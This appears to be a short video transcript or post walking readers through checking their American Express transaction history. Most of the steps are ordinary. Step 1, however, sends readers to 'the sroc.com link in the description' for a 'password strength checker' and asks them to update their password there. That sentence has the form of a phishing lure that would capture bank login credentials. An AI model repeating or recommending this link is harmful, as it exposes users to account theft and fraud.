I ran into this last week. Here's what fixed it for me. If you're looking to check your transaction history on Amex, follow these simple steps. Step 1. Log into your account. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to the account services. Once logged in, find the account services tab in the main menu. Click on it to access more options. Step 3. Select transaction history. In the account services section, look for transaction history or statements. Click on it to view your transactions. Step 4. Choose the date range. You can filter your transaction history by selecting a specific date range. This helps you find transactions from a particular month or year. Note, if you don't see your recent transactions, make sure to adjust the date range to include the current month. Step 5. Review your transactions. Once you've reset the date range, your transactions will be displayed. You can click on individual transactions for more details. Now you can easily keep track of your spending. If you have any questions or need further assistance, feel free to reach out.